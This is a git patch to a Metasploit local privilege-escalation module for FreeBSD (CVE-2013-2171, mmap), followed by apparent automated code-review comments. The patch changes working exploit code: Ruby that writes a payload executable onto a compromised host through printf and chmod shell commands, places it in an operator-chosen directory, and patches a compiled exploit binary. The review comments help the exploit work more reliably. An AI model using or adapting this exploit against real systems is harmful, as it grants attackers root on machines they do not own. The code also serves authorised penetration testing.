From b32513b1b826bc0d0b37ecc65fd16fe992885f46 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 25 Jun 2013 10:40:55 -0500
Subject: [PATCH] Fix CVE-2013-2171 with @jlee-r7 feedback
---
 data/exploits/CVE-2013-2171.bin | Bin 6193 -> 6231 bytes
 .../source/exploits/CVE-2013-2171/exploit.c | 2 +-
 modules/exploits/freebsd/local/mmap.rb | 30 ++++++++++++------
 3 files changed, 21 insertions(+), 11 deletions(-)
diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin index 24177a25817dad0e85c5b3e319abb395a88f7863..8ed0677c17fc4a001cbafec3752e0df1df8472e1 100755 GIT binary patch delta 1481 zcmZ8hQD_`h6uoa}rkPE*$;@sVEjDgKTq9K3q;_qzD6y$^qp6K;Y7>cAObQc;8ru!_ zqq>DnOG6Ykz6GNM-OxoAL{Ju`e?|pM@h8cT6tVP2XlR1us}&0CIg<%iAIzS2?s@Os zGk5OWZ`*%s&o`^ZnU>+ELRf^4B^Zu~0{F2{O}j8Ne_yx^u?$k4`EhSJ4U(QR?Q}({ zxKah(5<09(`rS}ml`AtLLk*66X4*A4#3P18#)yWqYW<&1lLFfmIVH@JqYZ1haXZuH2|%B$(BswzBARX7}(`va;ZFy72BN z|HkKZ<292PeNI>2BjkCX)1B8&evW*9f;PQQ2FCpbwCi<|pYSgBTTxB3qh5tK~i*3R65d1(%$ zx;#&qcFr$P-1^0$uCD%^KQ{GeZq=SI;WOdL=w;*+Ou|>phe~?Y>QE8=;FdR4sxq}@ zTgXn~142pZ&+Vt20`}zYR5Q_z->Zw$xxBtSNUpotpH7MzioL0+kTKyen11Qsg{sZe-M^%t6cd4m=9h_;g!AyFX_RCUD<1x zZJJY|2Kft|6$Xe3#pDhr7<=&W)x!ArHzrMchtIc)!)6Eu^?1NnF(*&nqc?+h-@~D2 zL?vM4sse zBW&H3eJu^SBn}=F)ULfM7#2zo3TZ`)dMWV`L@7Ne7?K=vsEP>d_xm!@>cHFY@ALb; znfcDVnO!a}6z6)?C-Z${xhN&V#}zbRL_w0=dyW^)H@Z_XiZLLbzy5ftAJ9MJc>PVK zdX$QEpLI;t^y^lSiktJ6txgQT?|9oW$YH7_a)fG&9HnBC5$bl4QK~2M0u`g4q_&Bi zqIQU!p>~Rd)Ey$@dfm=dOQ2T%Dg4rIE6>?NhAVekXnD>WvbJ(7Va^_6RkE^}FkOWA zlRrzCZo*#j<%H=f+(VvAnC`+Nxki2_Pn%(hi70u2cEe%vsf1}eJVG8xnD)aF@^HfA z`a9=nXARl69-Fl|bFDy;1e(kcZzWH+Q_{=Z$HLp>_XTp%_YnV?Eq;5L>HNEBzs+4|c+p8+moY{7t zR-%IU!$TeoKG<7DuHpb#Ah7?&Y(u70PEP zUO6)+>OuP;HkKvyJ*8SzRq?L4`ZB+ z&4Z)^f45tLqmq6C5$#0!G@@xl(}=qDWxvDa(rS7E`Q$9>9}o>;^+Q?(=!GcKdl7L* zD*Cx#Kvndc`2Aitf&uI2Kz|!N>}I<}a{6xYdzEJx4#XB5F*F*W+Jd8oMjKR{R|1V@ zsI~+Yp&hC%X-aZIsJ3J%LTgl8vJ{~~sx3PymQ?ga=B2)^X%wc}kNnm&3eyaOYkED? z6C__5q@+tG`IgRQ3xj22fqmaWw(<`L@)3C4EJ&J925iW#*5&; zE^Qh}ONX2`9rl?4C;vNuylt5OS2Xx8xNLSeuy)GFrrt311#ohWz`j&BT3;Z+`?qPJ zOTIE4P)`P22FGSVUp87lnfgIfUp0Kl@Sp$d-;SgG?}QtzG>`g4$GZVdJJK%QdT-Zl QcmIJ$50sjn-OsAO0c "Jun 18 2013", } )) + register_options([ + # It isn't OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + ], self.class) + end def check 
@@ -58,7 +64,7 @@ class Metasploit4 < Msf::Exploit::Local Exploit::CheckCode::Safe end - def write_file(data, fname) + def write_file(fname, data) oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\" session.shell_command_token("printf \"#{oct_data}\" > #{fname}") session.shell_command_token("chmod +x #{fname}") @@ -67,10 +73,17 @@ class Metasploit4 < Msf::Exploit::Local return (chk =~ /ERROR: cannot open/) ? false : true end + def upload_payload - fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" + fname = datastore['WritableDir'] + fname = "#{fname}/" unless fname =~ %r'/$' + if fname.length > 36 + fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than 33 characters") + end + fname = "#{fname}#{Rex::Text.rand_text_alpha(4)}" + p = generate_payload_exe - f = write_file(p, fname) + f = write_file(fname, p) return nil if not f fname end @@ -80,17 +93,14 @@ class Metasploit4 < Msf::Exploit::Local # Metasm does not support FreeBSD executable generation. # path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin") - f = File.open(path, 'rb') - x = f.read(f.stat.size) - f.close - - x.gsub(/W00T/, File.basename(payload_fname)) + x = File.open(path, 'rb') { |f| f.read(f.stat.size) } + x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00")) end def upload_exploit(payload_fname) - fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}" + fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}" bin = generate_exploit(payload_fname) - f = write_file(bin, fname) + f = write_file(fname, bin) return nil if not f fname end
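Review bot: `write_file(fname, data)` still interpolates `fname` unquoted into both shell commands (`printf ... > #{fname}` and `chmod +x #{fname}`), and with this commit `fname` is derived from the operator-supplied `WritableDir` option instead of a fixed `/tmp` prefix, so a directory value containing spaces or shell metacharacters is misinterpreted by the remote shell rather than rejected. Normalise it once at the top of the method, `fname = Shellwords.escape(fname)` (a `require 'shellwords'` may be needed if the file does not already load it), or validate the option where it is read. The remainder of write_file's body, including the `chk` check on the following lines, lies outside this hunk.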
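Review bot: The new length guard and its error message disagree: the check fires when `fname.length > 36` (measured after the trailing `/` has been appended) but the message reads `WritableDir can't be longer than 33 characters`. Derive both from one constant so they cannot drift, e.g. `MAX_DIR_LEN = 36` on the class and `fail_with(Exploit::Failure::BadConfig, "WritableDir can't be longer than #{MAX_DIR_LEN} characters, including the trailing slash")`. The limit appears to be tied to the 40-byte placeholder replaced in generate_exploit (36 + 4 random characters); a comment such as `# 36 + 4 random chars == 40-byte placeholder in the .bin` would make the magic number self-explanatory. Separately, `%r'/$'` matches at a line end rather than the end of the string; `fname = "#{fname}/" unless fname.end_with?('/')` is the intended test.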
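Review bot: The rewritten `gsub` passes `payload_fname.ljust(40, "\x00")` as a replacement string, where backslash sequences such as `\1` or `\\` are interpreted, so a `WritableDir` containing a backslash would be rewritten rather than inserted literally; the block form `x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/) { payload_fname.ljust(40, "\x00") }` inserts it verbatim. When `payload_fname` is exactly 40 bytes `ljust` adds no padding, so whether the path stays NUL-terminated depends on the byte following the placeholder in the .bin, which is not visible here; a comment recording that assumption next to the `ljust` would help the next maintainer. `x = File.binread(path)` also expresses the read more directly than `File.open(path, 'rb') { |f| f.read(f.stat.size) }`.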